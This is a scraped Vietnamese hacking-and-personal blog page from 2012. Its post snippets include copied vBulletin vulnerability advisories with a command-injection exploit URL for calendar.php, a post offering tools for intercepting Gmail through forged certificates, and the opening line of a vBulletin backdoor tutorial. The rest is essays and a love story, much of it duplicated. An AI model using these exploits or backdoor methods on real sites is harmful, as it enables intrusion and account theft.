Nhược điểm của trình duyệt Mozilla Firefox là thời gian khởi động và tải trang khá chậm so với Google Chrome. Vấn đề này có thể được khắc phục bằng những thao tác cấu hình đơn giản sau đây.
READ MORE »
Soft mien phi ,hoc tap ,hack website,hack game,tai lieu aptech,du an,project thong tin dai hoc ,ung dung androind
Wednesday, October 31, 2012
Hướng dẫn cách cấu hình để tăng tốc cho firefox
Nhược điểm của trình duyệt Mozilla Firefox là thời gian khởi động và tải trang khá chậm so với Google Chrome. Vấn đề này có thể được khắc phục bằng những thao tác cấu hình đơn giản sau đây.
READ MORE »
READ MORE »
Hướng dẫn tạo và sử dụng Cufón
Nếu đã từng thiết kế web, bạn sẽ biết về hạn chế khi sử dụng font chữ. Cũng vì thế có rất nhiều phương pháp khắc phục nhược điểm này (sIFR là một phương pháp được nhiều người biết tới). Hôm nay tôi xin giới thiệu với các bạn một cách làm khác: dùng Cufón.
READ MORE »
READ MORE »
Tuesday, October 30, 2012
Phương pháp thâm nhập Gmail
Sử dụng kỹ thuật giả mạo certificate. Kỹ thuât này do anh “tocbatdat – giảng viên CEH trung tâm I-TRAIN” viết
Link download toàn bộ tool và tài liệu hướng dẫn: http://www.mediafire.com/?igs3x7n3eeiq3g1
READ MORE »
Link download toàn bộ tool và tài liệu hướng dẫn: http://www.mediafire.com/?igs3x7n3eeiq3g1
READ MORE »
Phương pháp thâm nhập Gmail
Sử dụng kỹ thuật giả mạo certificate. Kỹ thuât này do anh “tocbatdat – giảng viên CEH trung tâm I-TRAIN” viết
Link download toàn bộ tool và tài liệu hướng dẫn: http://www.mediafire.com/?igs3x7n3eeiq3g1
READ MORE »
Link download toàn bộ tool và tài liệu hướng dẫn: http://www.mediafire.com/?igs3x7n3eeiq3g1
READ MORE »
Monday, October 29, 2012
vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability
Source: http://www.securityfocus.com/bid/6337/infoProblems with vBulletin could make it possible for an attacker to inject arbitrary HTML in vBulletin forum messages. |
vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability
Source: http://www.securityfocus.com/bid/6337/infoProblems with vBulletin could make it possible for an attacker to inject arbitrary HTML in vBulletin forum messages. |
vBulletin 2.0.x/2.2.x members2.php Cross Site Scripting Vulnerability
source: http://www.securityfocus.com/bid/6246/infoDue to insufficient sanitization of user supplied values, it is possible to exploit a vulnerability in VBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page which will include attacker-supplied HTML code which will be executed in a legitimate users browser. |
vBulletin 2.0/2.2.x Memberlist.PHP Cross Site Scripting Vulnerability
source: http://www.securityfocus.com/bid/6226/infovBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. |
As a result, it is possible for a remote attacker to create a malicious link containing script code which will be executed in the browser of a legitimate user, in the context of the website running vBulletin. |
vBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability
Source: http://www.securityfocus.com/bid/5820/infoA remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. |
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system. |
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22 |
where <command> signifies a command to be executed on the system.Nguồn: http://www.exploit-db.com/exploits/21874/
vBulletin 2.0/2.2.x Cross Site Scripting Vulnerabilities
Source: http://www.securityfocus.com/bid/5997/infovBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. |
vBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability
Source: http://www.securityfocus.com/bid/5820/infoA remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. |
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system. |
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22 |
where <command> signifies a command to be executed on the system.Nguồn: http://www.exploit-db.com/exploits/21874/
Demo tấn công qua Keylogger
Clip này Juno_okyo làm để tuyên truyền và cảnh báo về Hack CF thôi.
Mà post lên blog cho bạn nào chưa biết về Keylogger :D
Coi như demo về Keylogger nha!
Demo tấn công qua Keylogger
Clip này Juno_okyo làm để tuyên truyền và cảnh báo về Hack CF thôi.
Mà post lên blog cho bạn nào chưa biết về Keylogger :D
Coi như demo về Keylogger nha!
Đêm! Một mình trong đêm nghe mưa rơi rả rích!!! Sài gòn dạo này thật khác lạ, mọi thứ hình như chẳng còn như xưa. Một Sài gòn chợt mưa một nắng, một thành phố ồn ào, vồn vã nhiều khi như muốn cuốn con người ta đi làm cho người ta chẳng kịp dừng lại để suy nghĩ chuyện gì, nó cuốn mọi thứ đi thật là nhanh, thật mạnh mẽ…
Vậy mà!!! Giờ nó lại khác mất rồi… Sài gòn cũng có những ngày mưa rả rích, mưa có lúc xối xả như muốn cuốn trôi mọi thứ! Nhưng sao nó ko như trước? cuốn trôi đi tất cả!!!
Đêm nay! Trời mưa lâu quá, đã lâu lắm rồi mới lại được thấy một trận mưa như vậy, nó làm cho trong tôi trỗi dậy những hình ảnh, kỷ niệm của một nơi xa ấy! nơi chốn bình yên của mình, nơi mà chỉ cách đây 4 năm thôi nó muốn xa dời để tự tạo lập cho mình một vốn sống, tự cho rằng cái tôi sẽ làm nên tất cả… muốn đi xa để mọi thứ trở thành sự xao xuyến phía sau và một sự tự tin thật “mạnh mẽ” về tương lai phía trước… sự lựa chọn giúp tôi quên đi, vượt qua được những sai lầm mà cái tôi của nó gây ra, có thể nói nó chỉ đơn giản là những va vấp của tuổi mới lớn nhưng đã rèn luyện cho mình biết bao nhiêu thứ để khiến mình tự tin hơn và khôn hơn trong cách sống…
Bốn năm sau???
Mọi thứ đã thay đổi, nó đã biết mình là ai, vị trí của mình ở đâu và vai trò của mình là như thế nào… Tôi chưa bao giờ hối hận về quyết định của mình thậm chí luôn coi đó là một bước ngoặt mà cuộc sống này đã từng bắt mình quyết định lựa chọn và mình đã chọn đúng con đường. Con đường 4 năm đầu đời tự mình vươn ra 1 cuộc sống tự chịu trách nhiệm với chính bản thân… Nhưng hình như con đường này nó khiến mình vô tình quá, trải qua biết bao nhiêu điều, có biết bao người bạn, học được thật nhiều thứ để sống và tồn tại!!! nhưng đôi khi ở trong đêm nghe mưa rơi 1 mình sao thấy mình buồn quá, cô đơn!!! Điều mà trước đây mình coi nó là sự nhảm nhí nhưng nó lại trở thành kẻ thù vô hình của chính mình… nó dường như quanh quẩn đâu đây, nó đang ở bên mình, nó lẫn trong tiếng mưa rơi rả rích ở ngoài hiên cửa sổ, nó như đang muốn mời gọi hay thách thức mình hòa mình vào nó… Hình như tiếng mưa đang thách thức cái tôi trong mình, nó biết được điểm yếu của mình khi nào, là như thế nào… nó như đang lắng nghe mình muốn chia sẻ và muốn mình hãy cùng hòa vào trong nó!
Mưa ơi!!! Nếu mưa có thể xóa nhòa được tất cả thì có biết bao nhiêu người muốn đi dưới mưa??? Biết bao nhiêu người muốn mưa làm người bạn thân lớn nhất đời???
Mưa à! Mày đang làm cho tao trở nên yếu đuối, mày đang bắt tao phải nhớ lại tất cả những gì mà tao đã trải qua đó hả? Mi muốn tao phải ngồi suy ngẫm lại tất cả để đưa ra những câu trả lời tao đã làm được gì hả????
Mày thông minh lắm, nhưng mày chỉ là mưa thôi… mưa chẳng có tội, mưa chẳng biết suy nghĩ tất cả là do người nghĩ ra…
Vậy mà!!! Giờ nó lại khác mất rồi… Sài gòn cũng có những ngày mưa rả rích, mưa có lúc xối xả như muốn cuốn trôi mọi thứ! Nhưng sao nó ko như trước? cuốn trôi đi tất cả!!!
Đêm nay! Trời mưa lâu quá, đã lâu lắm rồi mới lại được thấy một trận mưa như vậy, nó làm cho trong tôi trỗi dậy những hình ảnh, kỷ niệm của một nơi xa ấy! nơi chốn bình yên của mình, nơi mà chỉ cách đây 4 năm thôi nó muốn xa dời để tự tạo lập cho mình một vốn sống, tự cho rằng cái tôi sẽ làm nên tất cả… muốn đi xa để mọi thứ trở thành sự xao xuyến phía sau và một sự tự tin thật “mạnh mẽ” về tương lai phía trước… sự lựa chọn giúp tôi quên đi, vượt qua được những sai lầm mà cái tôi của nó gây ra, có thể nói nó chỉ đơn giản là những va vấp của tuổi mới lớn nhưng đã rèn luyện cho mình biết bao nhiêu thứ để khiến mình tự tin hơn và khôn hơn trong cách sống…
Bốn năm sau???
Mọi thứ đã thay đổi, nó đã biết mình là ai, vị trí của mình ở đâu và vai trò của mình là như thế nào… Tôi chưa bao giờ hối hận về quyết định của mình thậm chí luôn coi đó là một bước ngoặt mà cuộc sống này đã từng bắt mình quyết định lựa chọn và mình đã chọn đúng con đường. Con đường 4 năm đầu đời tự mình vươn ra 1 cuộc sống tự chịu trách nhiệm với chính bản thân… Nhưng hình như con đường này nó khiến mình vô tình quá, trải qua biết bao nhiêu điều, có biết bao người bạn, học được thật nhiều thứ để sống và tồn tại!!! nhưng đôi khi ở trong đêm nghe mưa rơi 1 mình sao thấy mình buồn quá, cô đơn!!! Điều mà trước đây mình coi nó là sự nhảm nhí nhưng nó lại trở thành kẻ thù vô hình của chính mình… nó dường như quanh quẩn đâu đây, nó đang ở bên mình, nó lẫn trong tiếng mưa rơi rả rích ở ngoài hiên cửa sổ, nó như đang muốn mời gọi hay thách thức mình hòa mình vào nó… Hình như tiếng mưa đang thách thức cái tôi trong mình, nó biết được điểm yếu của mình khi nào, là như thế nào… nó như đang lắng nghe mình muốn chia sẻ và muốn mình hãy cùng hòa vào trong nó!
Mưa ơi!!! Nếu mưa có thể xóa nhòa được tất cả thì có biết bao nhiêu người muốn đi dưới mưa??? Biết bao nhiêu người muốn mưa làm người bạn thân lớn nhất đời???
Mưa à! Mày đang làm cho tao trở nên yếu đuối, mày đang bắt tao phải nhớ lại tất cả những gì mà tao đã trải qua đó hả? Mi muốn tao phải ngồi suy ngẫm lại tất cả để đưa ra những câu trả lời tao đã làm được gì hả????
Mày thông minh lắm, nhưng mày chỉ là mưa thôi… mưa chẳng có tội, mưa chẳng biết suy nghĩ tất cả là do người nghĩ ra…
Cây, Lá và Gió
Cây, Lá và Gió
Nếu bạn muốn có tình yêu của ai đó… đầu tiên hãy yêu người đó trước đã...
Cây
Lý do tôi được gọi là cây là vì tôi thích vẽ cây, một thời gian dài, tôi vẽ 1 cái cây nhỏ ở góc những bức tranh của tôi. Tôi đã từng hẹn hò với 5 cô gái khi tôi còn học dự bị đại học, trong số đó có 1 người tôi rất mến, rất mến nhưng lại ko có can đảm để quen cô ấy. Cô ấy không có khuôn mặt xinh đẹp, không có những ngón tay thon dài,không có một ngọai hình nổi bật, cô ấy là một cô gái hết sức bình thường.
Tôi thích cô ấy, thật sự thích cô ấy, tôi thích sự ngây thơ, thích nét tinh nghịch, thích sự dễ thương , thông minh và yếu ớt của cô ấy. Lý do mà tôi không quen với cô ấy là vì tôi nghĩ người quá bình thường như cô ấy thì không hợp với tôi. Tôi cũng sợ rằng khi quen nhau rồi thì những tình cảm tốt đẹp tôi dành cho cô ấy cũng tan vỡ. Một phần cũng sợ những tin đồn sẽ làm tổn thương cô ấy. Tôi nghĩ rằng nếu cô ấy thật sự dành cho tôi thì cuối cùng cô ấy cũng sẽ là của tôi và tôi không việc gì phải từ bỏ mọi thứ vì cô ấy. Lý do cuối cùng đã khiến cô ấy ở bên cạnh tôi suốt 3 năm. Cô ấy nhìn tôi theo đuổi những cô gái khác và.. tôi đã làm cô ấy khóc suốt 3 năm đó…
Cô ấy muốn làm một diễn viên giỏi nhưng tôi lại là một đạo diễn vô cùng khắt khe. Khi tôi hôn người bạn gái thứ 2 thì cô ấy từ đâu đi tới, cô ấy rất bối rối nhưng cũng chỉ cười và nói “ cứ tự nhiên” trước khi chạy đi.Ngày hôm sau, mắt cô ấy sưng như một hạt dẻ. Tôi cố tình không hiểu lý do tại sao cô ấy khóc và chọc cô ấy suốt ngày hôm đó. Khi mọi người đi về hết, cô ấy ngồi khóc một mình trong lớp. Cô ấy không biết tôi quay trở về lớp để lấy đồ …và tôi đã ngồi nhìn cô ấy khóc hơn 1 tiếng
Người bạn gái thứ tư của tôi không thích cô ấy. Có một lần hai người đã cãi nhau, tôi biết theo tính cách của cô ấy , cô ấy chắc chắn ko phải là người gây chuyện nhưng tôi vẫn đứng về phía bạn gái mình. Tôi mắng cô ấy, cô ấy đã nhìn tôi với một ánh mắt thật sự shock, tôi đã không quan tâm đến cảm giác của cô ấy và bỏ đi với bạn gái của mình
Ngày hôm sau, cô ấy vẫn cười giỡn với tôi như không có chuyện gì xảy ra, tôi biết cô ấy bị tổn thương nhưng tôi nghĩ cô ấy không biết, tôi cũng đau như cô ấy vậy.
Khi tôi chia tay với người bạn gái thứ 5, tôi đã hẹn hò với cô ấy, sau khi đi chơi được vài ngày tôi nói với cô ấy tôi có chuyện muốn nói cho cô ấy, cô ấy nhìn tôi và cũng nói là có chuyện muốn nói cho tôi biết. Tôi nói cho cô ấy nghe về việc tôi chia tay và cô ấy nói cho tôi hay là cô ấy bắt đầu quen người con trai khác. Tôi biết người đó là ai, người đó đã theo đuổi cô ấy một thời gian dài, một ngừời con trai rất dễ thương, năng động và đầy sức sống. Việc người đó thích cô ấy đã được bàn tán trong trường một thời gian dài.
Tôi không thể nói cho cô ấy biết là tim tôi đau như thế nào, tôi chỉ cười và chúc mừng cô ấy. Khi tôi về tới nhà, tim tôi đau đến nỗi tôi không thể đứng vững nổi nữa, giống như có một tảng đá đè nặng lên ngực tôi, Tôi không thở nổi, muốn hét thật to nhưng không thể. Nước mắt rơi xuống, tôi gục ngã và khóc.Đã bao nhiêu lần tôi nhìn thấy cô ấy khóc vì một người đàn ông cũng không chịu hiểu cho cảm giác của cô ấy?
Sau khi tốt nghiệp, tôi cứ đọc mãi cái sms được gửi 10 ngày sau đó, nó nói “ lá rời cây là vì gió cuốn đi hay là vì cây không giữ lá lại”
Lá
Suốt thời còn học dự bị đại học, tôi rất thích đi nhặt lá, tại sao ư? Tại vì tôi thấy để một cái lá rời khỏi cái cây mà nó đã dựa dẫm lâu như vậy cần phải rất can đảm.Suốt thời gian học dự bị, tôi luôn ở rất gần một người con trai, không phải là bạn trai đâu… chỉ là bạn bè thôi. Khi anh ấy có người bạn gái đầu tiên. Tôi học được một cảm giác mà trước giờ tôi nghĩ là mình ko thể có – Sự ghanh tị. Nỗi cay đắng đó không thể diễn tả bằng lời, giống như là cực đỉnh của đau khổ vậy. nhưng sau đó 2 tháng thì họ chia tay, tôi chưa kịp vui mừng thì anh ấy lại quen tiếp một người con gái khác
Tôi thích anh ấy và tôi biết rằng anh ấy cũng thích tôi. Nhưng tại sao anh ấy lại không hề biểu hiện? Tại sao anh ấy thích tôi mà lại không chịu bắt đầu trước. Mỗi lần anh ấy có bạn gái mới là một lần tim tôi đau nhói. Thời gian trôi qua, tim tôi đã vì anh ấy mà tổn thương rất nhiều. Tôi bắt đầu tin rằng đây chỉ là tình cảm đơn phương của mình tôi mà thôi.Nhưng nếu anh ấy không thích tôi thì tại sao lại đối xử tốt với tôi như vậy. Nó khác xa với việc anh ấy làm vì tình bạn. Thích một người sao mà khổ như vậy. Tôi có thể biết anh ấy thích gì, biết sở thích của anh ấy, nhưng tình cảm anh ấy dành cho tôi thì tôi không thể hiểu được và tôi cũng không thể nào mở lời được.
Trừ việc đó ra, tôi vẫn muốn được ở bên cạnh anh cấy, quan tâm anh ấy, chăm sóc anh ấy và yêu anh ấy, hi vọng một ngày đẹp trời nào đó anh ấy sẽ thay đổi và yêu tôi, kiểu như đợi điện thọai của anh ấy mỗi đêm, muốn anh ấy gửi tin nhắn cho mình… Tôi biết cho dù anh ấy bận thế nào, anh ấy cũng sẽ dành thời gian cho tôi. Bởi vì như vậy nên tôi đã chờ anh ấy. 3 năm thật khó mà trôi qua và nhiều lúc tôi cũng nghĩ đến chuyện bỏ cuộc. Thỉnh thỏang, tôi tự hỏi liệu tôi có nên tiếp tục đợi chờ hay không? Nỗi đau, sự tổn thương và nỗi ám ảnh đã theo tôi suốt 3 năm.
Cho đến năm tôi sắp tốt nghiệp, một chàng trai nhỏ hơn tôi 1 tuổi đã công khai theo đuổi tôi. Mỗi ngày anh ấy đều thể hiện tình cảm với tôi,anh ấy như một cơn gió, cố thổi một chiếc lá ra khỏi cành cây mà nó dựa dẫm, ban đầu tôi thấy hơi khó chịu, nhưng dần dần tôi đã dành cho anh ấy một góc nhỏ trong tim mình. Đến cuối cùng, tôi nhận ra rằng cơn gió đó có thể làm tôi hạnh phúc, có thể thổi tôi tới một vùng đất tốt đẹp hơn…cho nên cuối cùng tôi đã rời cây, nhưng cái cây chỉ cười và không hề khuyên tôi ở lại.
Lá lìa cành là vì gió thổi hay vì cây không giữ lá ở lại??
Gió
Bởi vì tôi thích một cô gái được gọi là Lá, bởi vì cô ấy quá dựa dẫm vào cây cho nên tôi phải trở thành một cơn gió mạnh, một cơn gió có thể cuốn cô ấy đi. Lần đầu tiên tôi gặp cô ấy là khỏang 1 tháng sau khi tôi chuyển trường tới đây. Tôi nhìn thấy một cô gái nhỏ nhắn hay nhìn đội trưởng và tôi chơi đá bóng. Suốt thời gian đó, cô ấy luôn ngồi đó , một mình hoặc với những người bạn chỉ để nhìn đội trường. Khi anh ấy nói chuyện với những cô gái khác, tôi nhận thấy sự ghen tị trong mắt cô ấy, khi anh ấy nhìn cô ấy, tôi lại thấy nụ cười trong mắt cô ấy. Nhìn cô ấy trở thành một sở thích của tôi, giống như cô ấy thích nhìn anh ấy vậy.
Một ngày, cô ấy không xuất hiện nữa, tôi cảm thấy như có gì đó trống vằng vậy. Tôi không thể giải thích nổi cảm giác của mình lúc đó , cảm thấy như là khó chịu lắm vậy, bữa đó đội trưởng cũng không tới , tôi tới lớp của 2 người, đứng ở ngòai và nhìn thấyanh ấy đang la mắng cô ấy. Mắt cô ấy ngân ngấn nước khi anh ta đi. Ngày hôm sau, tôi thấy cô ấy trở lại bình thường, vẫn ngồi đó và ngắm anh ta. Tôi đi ngang qua cô ấy và cười, tôi viết một lời nhắn và đưa cho cô ấy, cô ấy hơi ngạc nhiên, cô ấy nhìn tôi , cuời rồi nhận mảnh giấy. Ngày hôm sau, cô ấy xuất hiện, đưa tôi mảnh giấy rồi đi
“Trái tim của chiếc lá quá nặng nề, gió không thể thổi đi được đâu”
“Không phải tại vì trái tim chiếc lá quá nặng nề. Nó bởi vì chiếc lá không muốn rời hkỏi cây”
Tôi trả lời lời nhắn của cô ấy như vậy và dần dần cô ấy đã chấp nhận những món quà và điện thọai của tôi. Tôi biết người cô ấy yêu không phài là tôi. Nhưng tôi có linh cảm là một ngày nào đó tôi có thể làm cho cô ấy thích tôi. Trong vòng 4 tháng , tôi công khai tình cảm của tôi với cô ấy không dưới 20 lần . Mỗi lần như vậy, cô ấy đều chuyển đề tài, nhưng tôi không bỏ cuộc. Nếu tôi đã quyết định muốn có cô ấy, tôi sẽ làm mọi cách để cô ấy thích tôi. Tôi không thể nhớ nổi là tôi đã tỏ tình với cô ấy bao nhiêu lần. Mặc dù cô ấy lảng tránh nhưng trong lòng tôi vẫn nuôi hi vọng, hi vọng một ngày cô ấy sẽ chịu làm bạn gái của tôi.
Một hôm tôi gọi điện cho cô ấy nhưng cô ấy không nói gì cả. tôi hỏi cô ấy “ em đang làm gì vậy, sao em ko nói gì hết vậy”, cô ấy nói “ Đầu của em đau lắm” “hả?” “đầu em đau lắm” cô ấy lặp lại to hơn. Tôi cúp máy và vội vàng đón taxi đến nhà cô ấy, khi cô ấy vừa ra mở cổng, tôi ôm ghì cô ấy vào lòng….và từ hôm đó…chúng tôi là một cặp .
Vậy lá rời cây là vì gió thổi đi hay vì cây đã không giữ lá lại?...
Cây
Lý do tôi được gọi là cây là vì tôi thích vẽ cây, một thời gian dài, tôi vẽ 1 cái cây nhỏ ở góc những bức tranh của tôi. Tôi đã từng hẹn hò với 5 cô gái khi tôi còn học dự bị đại học, trong số đó có 1 người tôi rất mến, rất mến nhưng lại ko có can đảm để quen cô ấy. Cô ấy không có khuôn mặt xinh đẹp, không có những ngón tay thon dài,không có một ngọai hình nổi bật, cô ấy là một cô gái hết sức bình thường.
Tôi thích cô ấy, thật sự thích cô ấy, tôi thích sự ngây thơ, thích nét tinh nghịch, thích sự dễ thương , thông minh và yếu ớt của cô ấy. Lý do mà tôi không quen với cô ấy là vì tôi nghĩ người quá bình thường như cô ấy thì không hợp với tôi. Tôi cũng sợ rằng khi quen nhau rồi thì những tình cảm tốt đẹp tôi dành cho cô ấy cũng tan vỡ. Một phần cũng sợ những tin đồn sẽ làm tổn thương cô ấy. Tôi nghĩ rằng nếu cô ấy thật sự dành cho tôi thì cuối cùng cô ấy cũng sẽ là của tôi và tôi không việc gì phải từ bỏ mọi thứ vì cô ấy. Lý do cuối cùng đã khiến cô ấy ở bên cạnh tôi suốt 3 năm. Cô ấy nhìn tôi theo đuổi những cô gái khác và.. tôi đã làm cô ấy khóc suốt 3 năm đó…
Cô ấy muốn làm một diễn viên giỏi nhưng tôi lại là một đạo diễn vô cùng khắt khe. Khi tôi hôn người bạn gái thứ 2 thì cô ấy từ đâu đi tới, cô ấy rất bối rối nhưng cũng chỉ cười và nói “ cứ tự nhiên” trước khi chạy đi.Ngày hôm sau, mắt cô ấy sưng như một hạt dẻ. Tôi cố tình không hiểu lý do tại sao cô ấy khóc và chọc cô ấy suốt ngày hôm đó. Khi mọi người đi về hết, cô ấy ngồi khóc một mình trong lớp. Cô ấy không biết tôi quay trở về lớp để lấy đồ …và tôi đã ngồi nhìn cô ấy khóc hơn 1 tiếng
Người bạn gái thứ tư của tôi không thích cô ấy. Có một lần hai người đã cãi nhau, tôi biết theo tính cách của cô ấy , cô ấy chắc chắn ko phải là người gây chuyện nhưng tôi vẫn đứng về phía bạn gái mình. Tôi mắng cô ấy, cô ấy đã nhìn tôi với một ánh mắt thật sự shock, tôi đã không quan tâm đến cảm giác của cô ấy và bỏ đi với bạn gái của mình
Ngày hôm sau, cô ấy vẫn cười giỡn với tôi như không có chuyện gì xảy ra, tôi biết cô ấy bị tổn thương nhưng tôi nghĩ cô ấy không biết, tôi cũng đau như cô ấy vậy.
Khi tôi chia tay với người bạn gái thứ 5, tôi đã hẹn hò với cô ấy, sau khi đi chơi được vài ngày tôi nói với cô ấy tôi có chuyện muốn nói cho cô ấy, cô ấy nhìn tôi và cũng nói là có chuyện muốn nói cho tôi biết. Tôi nói cho cô ấy nghe về việc tôi chia tay và cô ấy nói cho tôi hay là cô ấy bắt đầu quen người con trai khác. Tôi biết người đó là ai, người đó đã theo đuổi cô ấy một thời gian dài, một ngừời con trai rất dễ thương, năng động và đầy sức sống. Việc người đó thích cô ấy đã được bàn tán trong trường một thời gian dài.
Tôi không thể nói cho cô ấy biết là tim tôi đau như thế nào, tôi chỉ cười và chúc mừng cô ấy. Khi tôi về tới nhà, tim tôi đau đến nỗi tôi không thể đứng vững nổi nữa, giống như có một tảng đá đè nặng lên ngực tôi, Tôi không thở nổi, muốn hét thật to nhưng không thể. Nước mắt rơi xuống, tôi gục ngã và khóc.Đã bao nhiêu lần tôi nhìn thấy cô ấy khóc vì một người đàn ông cũng không chịu hiểu cho cảm giác của cô ấy?
Sau khi tốt nghiệp, tôi cứ đọc mãi cái sms được gửi 10 ngày sau đó, nó nói “ lá rời cây là vì gió cuốn đi hay là vì cây không giữ lá lại”
Lá
Suốt thời còn học dự bị đại học, tôi rất thích đi nhặt lá, tại sao ư? Tại vì tôi thấy để một cái lá rời khỏi cái cây mà nó đã dựa dẫm lâu như vậy cần phải rất can đảm.Suốt thời gian học dự bị, tôi luôn ở rất gần một người con trai, không phải là bạn trai đâu… chỉ là bạn bè thôi. Khi anh ấy có người bạn gái đầu tiên. Tôi học được một cảm giác mà trước giờ tôi nghĩ là mình ko thể có – Sự ghanh tị. Nỗi cay đắng đó không thể diễn tả bằng lời, giống như là cực đỉnh của đau khổ vậy. nhưng sau đó 2 tháng thì họ chia tay, tôi chưa kịp vui mừng thì anh ấy lại quen tiếp một người con gái khác
Tôi thích anh ấy và tôi biết rằng anh ấy cũng thích tôi. Nhưng tại sao anh ấy lại không hề biểu hiện? Tại sao anh ấy thích tôi mà lại không chịu bắt đầu trước. Mỗi lần anh ấy có bạn gái mới là một lần tim tôi đau nhói. Thời gian trôi qua, tim tôi đã vì anh ấy mà tổn thương rất nhiều. Tôi bắt đầu tin rằng đây chỉ là tình cảm đơn phương của mình tôi mà thôi.Nhưng nếu anh ấy không thích tôi thì tại sao lại đối xử tốt với tôi như vậy. Nó khác xa với việc anh ấy làm vì tình bạn. Thích một người sao mà khổ như vậy. Tôi có thể biết anh ấy thích gì, biết sở thích của anh ấy, nhưng tình cảm anh ấy dành cho tôi thì tôi không thể hiểu được và tôi cũng không thể nào mở lời được.
Trừ việc đó ra, tôi vẫn muốn được ở bên cạnh anh cấy, quan tâm anh ấy, chăm sóc anh ấy và yêu anh ấy, hi vọng một ngày đẹp trời nào đó anh ấy sẽ thay đổi và yêu tôi, kiểu như đợi điện thọai của anh ấy mỗi đêm, muốn anh ấy gửi tin nhắn cho mình… Tôi biết cho dù anh ấy bận thế nào, anh ấy cũng sẽ dành thời gian cho tôi. Bởi vì như vậy nên tôi đã chờ anh ấy. 3 năm thật khó mà trôi qua và nhiều lúc tôi cũng nghĩ đến chuyện bỏ cuộc. Thỉnh thỏang, tôi tự hỏi liệu tôi có nên tiếp tục đợi chờ hay không? Nỗi đau, sự tổn thương và nỗi ám ảnh đã theo tôi suốt 3 năm.
Cho đến năm tôi sắp tốt nghiệp, một chàng trai nhỏ hơn tôi 1 tuổi đã công khai theo đuổi tôi. Mỗi ngày anh ấy đều thể hiện tình cảm với tôi,anh ấy như một cơn gió, cố thổi một chiếc lá ra khỏi cành cây mà nó dựa dẫm, ban đầu tôi thấy hơi khó chịu, nhưng dần dần tôi đã dành cho anh ấy một góc nhỏ trong tim mình. Đến cuối cùng, tôi nhận ra rằng cơn gió đó có thể làm tôi hạnh phúc, có thể thổi tôi tới một vùng đất tốt đẹp hơn…cho nên cuối cùng tôi đã rời cây, nhưng cái cây chỉ cười và không hề khuyên tôi ở lại.
Lá lìa cành là vì gió thổi hay vì cây không giữ lá ở lại??
Gió
Bởi vì tôi thích một cô gái được gọi là Lá, bởi vì cô ấy quá dựa dẫm vào cây cho nên tôi phải trở thành một cơn gió mạnh, một cơn gió có thể cuốn cô ấy đi. Lần đầu tiên tôi gặp cô ấy là khỏang 1 tháng sau khi tôi chuyển trường tới đây. Tôi nhìn thấy một cô gái nhỏ nhắn hay nhìn đội trưởng và tôi chơi đá bóng. Suốt thời gian đó, cô ấy luôn ngồi đó , một mình hoặc với những người bạn chỉ để nhìn đội trường. Khi anh ấy nói chuyện với những cô gái khác, tôi nhận thấy sự ghen tị trong mắt cô ấy, khi anh ấy nhìn cô ấy, tôi lại thấy nụ cười trong mắt cô ấy. Nhìn cô ấy trở thành một sở thích của tôi, giống như cô ấy thích nhìn anh ấy vậy.
Một ngày, cô ấy không xuất hiện nữa, tôi cảm thấy như có gì đó trống vằng vậy. Tôi không thể giải thích nổi cảm giác của mình lúc đó , cảm thấy như là khó chịu lắm vậy, bữa đó đội trưởng cũng không tới , tôi tới lớp của 2 người, đứng ở ngòai và nhìn thấyanh ấy đang la mắng cô ấy. Mắt cô ấy ngân ngấn nước khi anh ta đi. Ngày hôm sau, tôi thấy cô ấy trở lại bình thường, vẫn ngồi đó và ngắm anh ta. Tôi đi ngang qua cô ấy và cười, tôi viết một lời nhắn và đưa cho cô ấy, cô ấy hơi ngạc nhiên, cô ấy nhìn tôi , cuời rồi nhận mảnh giấy. Ngày hôm sau, cô ấy xuất hiện, đưa tôi mảnh giấy rồi đi
“Trái tim của chiếc lá quá nặng nề, gió không thể thổi đi được đâu”
“Không phải tại vì trái tim chiếc lá quá nặng nề. Nó bởi vì chiếc lá không muốn rời hkỏi cây”
Tôi trả lời lời nhắn của cô ấy như vậy và dần dần cô ấy đã chấp nhận những món quà và điện thọai của tôi. Tôi biết người cô ấy yêu không phài là tôi. Nhưng tôi có linh cảm là một ngày nào đó tôi có thể làm cho cô ấy thích tôi. Trong vòng 4 tháng , tôi công khai tình cảm của tôi với cô ấy không dưới 20 lần . Mỗi lần như vậy, cô ấy đều chuyển đề tài, nhưng tôi không bỏ cuộc. Nếu tôi đã quyết định muốn có cô ấy, tôi sẽ làm mọi cách để cô ấy thích tôi. Tôi không thể nhớ nổi là tôi đã tỏ tình với cô ấy bao nhiêu lần. Mặc dù cô ấy lảng tránh nhưng trong lòng tôi vẫn nuôi hi vọng, hi vọng một ngày cô ấy sẽ chịu làm bạn gái của tôi.
Một hôm tôi gọi điện cho cô ấy nhưng cô ấy không nói gì cả. tôi hỏi cô ấy “ em đang làm gì vậy, sao em ko nói gì hết vậy”, cô ấy nói “ Đầu của em đau lắm” “hả?” “đầu em đau lắm” cô ấy lặp lại to hơn. Tôi cúp máy và vội vàng đón taxi đến nhà cô ấy, khi cô ấy vừa ra mở cổng, tôi ôm ghì cô ấy vào lòng….và từ hôm đó…chúng tôi là một cặp .
Vậy lá rời cây là vì gió thổi đi hay vì cây đã không giữ lá lại?...
Share code Flash Intro đẹp (kèm XML)
Demo:
http://taigame8.com/code/wedding/Download:
http://www.mediafire.com/?ff11szkms3pfzziPass Unlock:
junookyo
Sunday, October 28, 2012
Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả
Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
